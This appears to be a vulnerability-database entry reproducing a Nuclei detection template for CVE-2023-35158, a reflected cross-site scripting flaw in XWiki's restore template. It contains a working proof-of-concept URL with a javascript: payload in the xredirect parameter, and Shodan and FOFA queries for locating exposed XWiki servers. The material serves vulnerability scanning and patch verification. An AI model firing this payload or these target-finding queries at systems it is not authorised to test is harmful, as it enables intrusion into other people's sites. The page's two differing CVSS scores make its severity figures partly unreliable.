Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-35158HistoryMay 15, 2024 - 5:14 a.m.
XWiki - Cross-Site Scripting
2024-05-1505:14:26
ProjectDiscovery
github.com
5
xwiki
cross-site scripting
xss
url injection
security patch
9.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.6 High
AI Score
Confidence
High
0.398 Low
EPSS
Percentile
97.3%
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
id: CVE-2023-35158
info:
name: XWiki - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
remediation: |
Update XWiki to the latest version to mitigate the Reflected XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35158
cwe-id: CWE-87
epss-score: 0.62633
epss-percentile: 0.97829
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: xwiki
product: xwiki
shodan-query:
- "XWiki"
- xwiki
- http.html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"
matchers:
- type: dsl
dsl:
- 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502200d194a8ba0215722eef75f47793612556c309a23957a41c3a7bfc3eef3a42779022100f20a9c24a66611d3e34c021e04f429ab7fe14b13b16990525f579490b6c2605f:922c64590222798bb761d5b6d8e72950References
Related
cvelist
cvelist
nvd
nvd
CVE-2023-35158
2023-06-23 19:15:09
cve
cve
CVE-2023-35158
2023-06-23 19:15:09
osv
osv
XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in restore template
2023-06-22 19:59:33
CVE-2023-35158
2023-06-23 19:15:09
prion
prion
Design/Logic Flaw
2023-06-23 19:15:00
github
github
9.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.6 High
AI Score
Confidence
High
0.398 Low
EPSS
Percentile
97.3%
Related for NUCLEI:CVE-2023-35158